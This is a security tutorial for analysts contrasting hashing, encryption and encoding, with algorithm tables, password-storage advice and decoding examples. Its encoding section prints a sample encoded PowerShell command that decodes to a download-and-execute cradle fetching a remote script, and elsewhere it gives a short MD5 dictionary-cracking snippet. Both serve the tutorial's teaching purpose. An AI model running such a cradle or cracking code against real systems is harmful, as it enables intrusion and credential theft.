Hashing vs Encryption vs Encoding

The Three Concepts — Hashing, Encryption, Encoding

These three concepts are among the most commonly confused in security. Analysts who use them incorrectly lose credibility with engineering teams and make mistakes in investigations. Each serves a fundamentally different purpose:

Concept	Direction	Key Required?	Deterministic?	Reversible?	Purpose
Hashing	One-way	No	Yes (same input = same hash)	No (computationally infeasible)	Integrity verification, password storage
Encryption	Two-way	Yes (symmetric or asymmetric)	No, in practice (a random IV or nonce makes each ciphertext differ)	Yes (with the key)	Confidentiality
Encoding	Both directions	No	Yes (always)	Yes (trivial — anyone can decode)	Data format transformation

The Critical Distinction

Hashing is a one-way mathematical function. You feed in data, you get a fixed-length digest. Given the digest, you cannot recover the original data (except by brute-forcing inputs and comparing). Example: password storage in /etc/shadow.

Encryption is a two-way function with a key. You feed in plaintext + key, you get ciphertext. Given the ciphertext + key, you recover the plaintext. Example: TLS, BitLocker, PGP.

Encoding is a format transformation. Base64, hex, and URL encoding change how data is represented. No secrecy is involved — encoding is not security. Analysts see encoded data (especially Base64) and mistake it for hash values or encrypted data. A Base64 string can be decoded in seconds with echo "cGFzc3dvcmQ=" | base64 -d.
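The contrast can be seen side by side in a short Python sketch. This is only an illustration: the standard library has no AES, so a single-use XOR key (a one-time pad) stands in for a real cipher, and the variable names are chosen for this example.

```python
import base64
import hashlib
import secrets

data = b"password"

# Hashing: fixed-length digest, no key, no way back except guessing inputs.
digest = hashlib.sha256(data).hexdigest()

# Encryption (toy stand-in): XOR with a random, single-use key of equal length.
# Real systems use vetted ciphers such as AES-GCM; this only shows the key's role.
key = secrets.token_bytes(len(data))
ciphertext = bytes(p ^ k for p, k in zip(data, key))
recovered = bytes(c ^ k for c, k in zip(ciphertext, key))

# Encoding: anyone can reverse it, no key involved.
encoded = base64.b64encode(data).decode("ascii")
decoded = base64.b64decode(encoded)

print("sha256 :", digest)
print("xor-enc:", ciphertext.hex(), "->", recovered)
print("base64 :", encoded, "->", decoded)
```

Only the middle step needs a secret to reverse. The digest cannot be reversed at all, and the Base64 string can be reversed by anyone.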

Hashing — One-Way Integrity Verification

How Hashing Works

A hash function takes any input (a file, a password, a message) and produces a fixed-length output called a digest or hash value. The same input always produces the same output. Even a single bit change in the input produces a completely different hash (the avalanche effect).

Input: "password123"
SHA-256: ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f

Input: "Password123"  (capital P)
SHA-256: 008c70392e3abfbd0fa47bbc2ed96aa99bd49e159727fcba0f2e6abeb3a9d601
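The avalanche effect is easy to check for yourself. The sketch below hashes the two inputs above and counts how many of the 256 output bits differ; the helper names are made up for this example.

```python
import hashlib

def sha256_hex(text: str) -> str:
    """Return the SHA-256 digest of a UTF-8 string as 64 hex characters."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

def differing_bits(hex_a: str, hex_b: str) -> int:
    """Count bit positions where two equal-length hex digests differ."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")

a = sha256_hex("password123")
b = sha256_hex("Password123")  # only the first letter changes

print(a)
print(b)
print(differing_bits(a, b), "of 256 bits differ")
```

For a well-behaved hash function the count should land near 128, that is, about half the bits flip even though only one character changed.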

Common Hash Algorithms — Comparison

Algorithm	Digest Size	Security Status	Use Case
MD5	128 bits (32 hex chars)	Broken: practical collision attacks (2008 rogue CA certificate, 2012 Flame malware)	Legacy compatibility only. Do not use for security.
SHA-1	160 bits (40 hex chars)	Broken: the SHAttered attack (2017) demonstrated a practical collision	Deprecated. Avoid in all security contexts.
SHA-256	256 bits (64 hex chars)	Secure	The current standard for file integrity, TLS certificates, digital signatures, and blockchain. Too fast to use directly for password hashing, even with a salt.
SHA-512	512 bits (128 hex chars)	Secure	Larger digest and security margin than SHA-256. Can be faster than SHA-256 on 64-bit CPUs without SHA hardware extensions.
SHA-3	Variable (224/256/384/512)	Secure	Newest NIST standard. Different internal structure than SHA-2. Future-proofing.
bcrypt	184 bits (60-char encoded string)	Secure	Designed for password hashing. Includes embedded salt and configurable work factor. Deliberately far slower than SHA-256, which is what makes password guessing expensive.
scrypt	Variable	Secure	Password hashing designed to be memory-hard (resists GPU/ASIC cracking).
Argon2id	Variable	Secure (recommended by OWASP)	Winner of the 2015 Password Hashing Competition. Current best practice for password storage. Memory-hard, time-hard, parallelizable.
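The digest sizes of the general-purpose algorithms in the table can be confirmed with Python's hashlib. This is a small sketch; bcrypt, scrypt, and Argon2id are left out because they are password-hashing schemes with their own interfaces.

```python
import hashlib

ALGORITHMS = ("md5", "sha1", "sha256", "sha512", "sha3_256")

# Map each algorithm name to its digest size in bits.
digest_bits = {name: hashlib.new(name).digest_size * 8 for name in ALGORITHMS}

for name, bits in digest_bits.items():
    # Each hex character carries 4 bits.
    print(f"{name:<9} {bits:>4} bits  {bits // 4:>3} hex chars")
```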

Password Hashing — The Right Way

When investigating a credential theft, the first question is: were the passwords properly hashed?

Bad (reversible or trivial):

$ echo "cGFzc3dvcmQ=" | base64 -d
password

Base64 is not hashing. If the password fields in a breach dump Base64-decode to readable passwords, the site effectively stored them in plaintext.

Better but still wrong:

plaintext password → MD5 → 5f4dcc3b5aa765d61d8327deb882cf99

MD5 is fast: a single modern GPU can compute on the order of 10 billion or more MD5 hashes per second. At that rate, running the entire RockYou wordlist (roughly 14 million passwords) against unsalted MD5 hashes takes seconds at most.
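A dictionary attack on an unsalted MD5 hash is only a few lines of code. The sketch below uses a four-word list invented for this example in place of a real wordlist, and the function name is hypothetical.

```python
import hashlib
from typing import Iterable, Optional

def crack_md5(target_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose MD5 digest matches target_hex, else None."""
    target = target_hex.lower()
    for word in candidates:
        if hashlib.md5(word.encode("utf-8")).hexdigest() == target:
            return word
    return None

# Tiny illustrative wordlist; a real attack would stream millions of entries.
wordlist = ["123456", "qwerty", "password", "letmein"]

print(crack_md5("5f4dcc3b5aa765d61d8327deb882cf99", wordlist))  # prints: password
```

Because there is no salt and each guess costs one cheap MD5 call, the same loop works against every user in the dump at once.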

Good:

plaintext password + unique salt + bcrypt → $2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy

The $2a$ prefix identifies bcrypt. 10 is the cost factor (2^10 = 1,024 key-expansion iterations). The salt is embedded in the output as the 22 characters that follow the cost. Each password gets a different salt, so precomputed rainbow tables are useless.
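The same salted, deliberately slow pattern can be sketched in Python. bcrypt and Argon2id are not in the standard library, so this example swaps in hashlib.scrypt as a stand-in; the cost parameters and function names are assumptions for illustration, not recommendations.

```python
import hashlib
import hmac
import secrets

# Illustrative cost parameters (assumptions); tune them for your own hardware.
SCRYPT_PARAMS = dict(n=2**14, r=8, p=1, maxmem=64 * 1024 * 1024, dklen=32)

def hash_password(password: str) -> tuple[bytes, bytes]:
    """Derive a slow, salted hash. Returns (salt, derived_key)."""
    salt = secrets.token_bytes(16)  # unique random salt per password
    derived = hashlib.scrypt(password.encode("utf-8"), salt=salt, **SCRYPT_PARAMS)
    return salt, derived

def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    """Re-derive with the stored salt and compare in constant time."""
    derived = hashlib.scrypt(password.encode("utf-8"), salt=salt, **SCRYPT_PARAMS)
    return hmac.compare_digest(derived, expected)

salt, stored = hash_password("correct horse")
print(verify_password("correct horse", salt, stored))
print(verify_password("wrong guess", salt, stored))
```

Hashing the same password twice yields different stored values because each call draws a fresh salt, which is the property that defeats precomputed tables.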

Identifying Hash Types in Breach Data

When you see a hash in a breach report, identify the algorithm by format:

Format	Likely Algorithm	Length (hex chars)
`$1$salt$hash`	MD5-crypt (Unix)	Variable
$2a$ / $2b$ / $2y$	bcrypt	Variable (includes cost + salt)
$5$	SHA-256-crypt (Unix)	Variable
$6$	SHA-512-crypt (Unix)	Variable
`{MD5}base64hash`	MD5 (LDAP)	24 (Base64)
`{SSHA}base64hash`	Salted SHA-1 (LDAP)	Variable (Base64)
32 hex characters	MD4 (NTLM), MD5, or MD2	32
40 hex characters	SHA-1	40
64 hex characters	SHA-256	64
`$argon2id$v=19$...`	Argon2id	Variable

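Tools like hashid and hash-identifier can suggest likely hash types from the format. Treat the result as a shortlist: algorithms with identical output lengths (for example MD5 and NTLM) cannot be told apart by format alone.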
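The format rules in the table translate into a simple lookup. The following is a minimal sketch covering only the prefix and hex-length rows above; the function name and return strings are invented for this example, and real tools know far more formats.

```python
import re

# Prefix rules taken from the table above, most specific first.
PREFIXES = [
    ("$argon2id$", "Argon2id"),
    ("$2a$", "bcrypt"),
    ("$2b$", "bcrypt"),
    ("$2y$", "bcrypt"),
    ("$1$", "MD5-crypt"),
    ("$5$", "SHA-256-crypt"),
    ("$6$", "SHA-512-crypt"),
    ("{SSHA}", "Salted SHA-1 (LDAP)"),
]

# Bare hex digests can only be narrowed down by length.
HEX_LENGTHS = {32: "MD5, NTLM (MD4), or MD2", 40: "SHA-1", 64: "SHA-256"}

def guess_hash_type(value: str) -> str:
    """Return a best-effort guess at the algorithm behind a hash string."""
    value = value.strip()
    for prefix, name in PREFIXES:
        if value.startswith(prefix):
            return name
    if re.fullmatch(r"[0-9a-fA-F]+", value) and len(value) in HEX_LENGTHS:
        return HEX_LENGTHS[len(value)]
    return "unknown"

print(guess_hash_type("$2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy"))
print(guess_hash_type("5f4dcc3b5aa765d61d8327deb882cf99"))
```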

Encryption — Two-Way with a Key

Types of Encryption

Symmetric Encryption — Same key for encryption and decryption.

Algorithm	Key Size	Security	Use Case
AES-128	128 bits	Secure	Disk encryption (BitLocker, FileVault), TLS, Wi-Fi (WPA2). Fast, hardware-accelerated on modern CPUs.
AES-256	256 bits	Secure	Larger security margin than AES-128. Required for TOP SECRET data under NSA Suite B and its successor CNSA (Suite B permitted AES-128 up to SECRET). Slightly slower than AES-128.
ChaCha20	256 bits	Secure	Modern stream cipher. Often preferred over AES on devices without hardware AES acceleration, such as older mobile CPUs. Used in TLS 1.3, WireGuard, SSH.
DES	56 bits	Broken	56-bit keys can be brute-forced in < 24 hours. Do not use.
3DES	168 bits (112-bit effective security)	Deprecated	64-bit block size makes it vulnerable to the Sweet32 attack (2016). Do not use.
Blowfish	32-448 bits	Weak (block size)	64-bit block size makes it vulnerable to birthday attacks at ~32 GB data. Use AES instead.
Twofish	128-256 bits	Secure	AES finalist. Less common but still secure.
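The ~32 GB figure for 64-bit block ciphers comes from the birthday bound: block collisions become likely after about 2^(n/2) blocks for an n-bit block size. A short calculation, with a function name chosen for this example, reproduces it:

```python
def birthday_bound_bytes(block_bits: int) -> int:
    """Data volume at which block collisions become likely: 2^(n/2) blocks."""
    blocks = 2 ** (block_bits // 2)
    bytes_per_block = block_bits // 8
    return blocks * bytes_per_block

GIB = 2 ** 30

# 64-bit blocks (Blowfish, DES, 3DES): 2^32 blocks * 8 bytes = 32 GiB.
print(birthday_bound_bytes(64) // GIB, "GiB for 64-bit blocks")

# 128-bit blocks (AES, Twofish): 2^64 blocks * 16 bytes, far beyond practical traffic volumes.
print(birthday_bound_bytes(128) // GIB, "GiB for 128-bit blocks")
```

This is why the block size, not the key size, is the limiting weakness of Blowfish and 3DES on long-lived connections.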

Asymmetric Encryption — Public/private key pair. Public key encrypts, private key decrypts.

Algorithm	Key Size	Security	Use Case
RSA	2048-4096 bits	Secure at 2048+	TLS certificates, PGP, SSH (legacy). Slow — typically used to encrypt symmetric keys.
ECC	256-521 bits	Secure	Modern alternative to RSA. Much smaller keys (256-bit ECC is roughly as strong as 3072-bit RSA). Used in TLS 1.3, SSH (Ed25519), Bitcoin.
DSA	1024-3072 bits	Deprecated	Old NIST standard. Largely replaced by ECDSA.
Diffie-Hellman	2048+ bits	Secure (with proper groups)	Key exchange only — not encryption. Foundation of TLS key agreement.

Real-World Encryption Examples

TLS — Transport Layer Security

Client connects to https://
Server sends its RSA or ECDSA certificate (signed by a CA)
Client and server perform key exchange (ECDHE handshake)
Result: a symmetric AES-256 or ChaCha20 session key shared between client and server
All data encrypted for the duration of the session

Disk Encryption (BitLocker)

Writes: data encrypted with AES-128/256 before writing to disk
Reads: data decrypted from disk into memory
Key: TPM-protected or recovery key
Protects against: physical theft of the drive, cold boot attacks (partially), offline OS modification

PGP / Age

File encrypted with symmetric key, symmetric key encrypted with recipient’s public key
Only the recipient’s private key can decrypt the symmetric key, which decrypts the file
Real-world: secure file transfer, encrypted email. PGP keys are also used for Git commit signing, which is a signature rather than encryption.

Encoding — Just a Format Change

Encoding is not security. It is a transformation between data formats so that binary data can be transmitted over text-based protocols or displayed safely in various contexts.

Common Encoding Schemes

Scheme	Purpose	Example (output of “password”)
Base64	Binary → ASCII for safe transmission over text protocols	`cGFzc3dvcmQ=`
Hex	Binary → hexadecimal representation	`70617373776f7264`
URL encoding	Special characters in URLs	`passw%6Frd` (o → %6F)
HTML entities	Prevent HTML injection	`&lt;script&gt;` for `<script>`
Unicode escapes	Escaping special Unicode characters	`\u0070\u0061\u0073...`

What Analysts Commonly See

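Base64 in logs: PowerShell commands are often Base64-encoded. -EncodedCommand followed by a Base64 string is an immediate escalation indicator. The payload is Base64 over UTF-16LE text, so decoding takes two steps: Base64-decode, then convert from UTF-16LE.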

powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA=

Decode it:

echo 'SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA=' | base64 -d | iconv -f UTF-16LE -t UTF-8

Result:

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2/payload.ps1')
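The same two-step decode (Base64, then UTF-16LE) can be scripted for bulk log review. This is a minimal Python sketch using the sample string above; the function name is made up for this example.

```python
import base64

def decode_encoded_command(b64_payload: str) -> str:
    """Decode a PowerShell -EncodedCommand argument: Base64 over UTF-16LE text."""
    return base64.b64decode(b64_payload).decode("utf-16-le")

payload = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA="

print(decode_encoded_command(payload))
```

Decoding as UTF-8 instead would leave a NUL byte after every character, which is a quick tell that the source was UTF-16LE.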

Hex in memory dumps: Memory forensics tools display strings in hex. A string 65 78 70 6C 6F 72 65 72 in a memory dump decodes to “explorer” — useful for identifying process names.

URL encoding in proxy logs: %68%74%74%70%73%3A%2F%2F decodes to https:// — useful for identifying obfuscated URLs in proxy logs.
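Both of these decodes are one-liners in Python's standard library. The sketch below reuses the two sample strings above; the variable names are chosen for this example.

```python
from urllib.parse import unquote

# Space-separated hex bytes, as a memory forensics tool might display them.
hex_text = bytes.fromhex("65 78 70 6C 6F 72 65 72").decode("ascii")

# Percent-encoded characters, as they might appear in a proxy log.
url_text = unquote("%68%74%74%70%73%3A%2F%2F")

print(hex_text)  # explorer
print(url_text)  # https://
```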

Putting It All Together — Analysts’ Quick Reference

Scenario: You Find `JDJhJDEwJE5ROW5qOHVMT2lj...` in a Data Breach Dump

Base64-decode it first. The decoded value starts with $2a$10$ → bcrypt hash that was merely wrapped in Base64. Good: the password was properly hashed.
If the value decodes to readable text instead (for example, cGFzc3dvcmQ= → password) → not hashed. The site stored plaintext credentials encoded as Base64. Immediate escalation.
If the value is 32 hex characters (for example, 5f4dcc3b5aa765d61d8327deb882cf99) → MD5 or NTLM. Weak and likely crackable, but at least the site stored a hash.
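The checks in this scenario can be sketched as a small triage helper. It is a rough illustration only: the function name and return strings are invented, and hex is tested before Base64 because a 32-character hex string is also valid Base64.

```python
import base64
import binascii
import re

BCRYPT_PREFIXES = ("$2a$", "$2b$", "$2y$")

def triage(value: str) -> str:
    """Classify a credential field from a breach dump (best effort)."""
    value = value.strip()
    # Check hex first: 32 hex characters would also pass Base64 validation.
    if re.fullmatch(r"[0-9a-fA-F]{32}", value):
        return "32 hex chars: MD5 or NTLM (weak)"
    if value.startswith(BCRYPT_PREFIXES):
        return "bcrypt hash"
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return "unknown format"
    if decoded.startswith(BCRYPT_PREFIXES):
        return "Base64-wrapped bcrypt hash"
    if decoded.isprintable():
        return f"Base64-encoded plaintext: {decoded!r}"
    return "Base64 of non-printable data"

# Only the visible prefix of the truncated sample in the heading is used here.
print(triage("JDJhJDEwJE5ROW5qOHVMT2lj"))
print(triage("cGFzc3dvcmQ="))
print(triage("5f4dcc3b5aa765d61d8327deb882cf99"))
```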

Scenario: You See an Encrypted Communication Log

Protocol: TLS 1.3 with TLS_AES_256_GCM_SHA384 → strong. No payload visibility, but that’s expected.
Protocol: TLS 1.0 with TLS_RSA_WITH_RC4_128_SHA → weak. Both the protocol version and the RC4 cipher are deprecated and need remediation.
If you see the plaintext in the log alongside the ciphertext → logging at the wrong layer. The application decrypted before logging.
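A first-pass check of protocol and cipher suite pairs from a log can be automated. The sketch below is a simplified assumption of what "weak" means (a short deny-list of protocol versions and cipher-suite substrings), not a complete policy, and the names are hypothetical.

```python
# Deny-lists are illustrative assumptions, not an exhaustive policy.
WEAK_PROTOCOLS = {"SSLv3", "TLS 1.0", "TLS 1.1"}
WEAK_MARKERS = ("RC4", "3DES", "_DES_", "MD5", "NULL", "EXPORT")

def assess_tls(protocol: str, cipher_suite: str) -> str:
    """Return 'strong' or 'weak: <reasons>' for a protocol/cipher-suite pair."""
    reasons = []
    if protocol in WEAK_PROTOCOLS:
        reasons.append(f"deprecated protocol {protocol}")
    for marker in WEAK_MARKERS:
        if marker in cipher_suite:
            reasons.append(f"weak component {marker.strip('_')}")
    return "weak: " + ", ".join(reasons) if reasons else "strong"

print(assess_tls("TLS 1.3", "TLS_AES_256_GCM_SHA384"))
print(assess_tls("TLS 1.0", "TLS_RSA_WITH_RC4_128_SHA"))
```

A deny-list like this only flags known-bad combinations. An allow-list of approved suites is the stricter design when the environment permits it.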
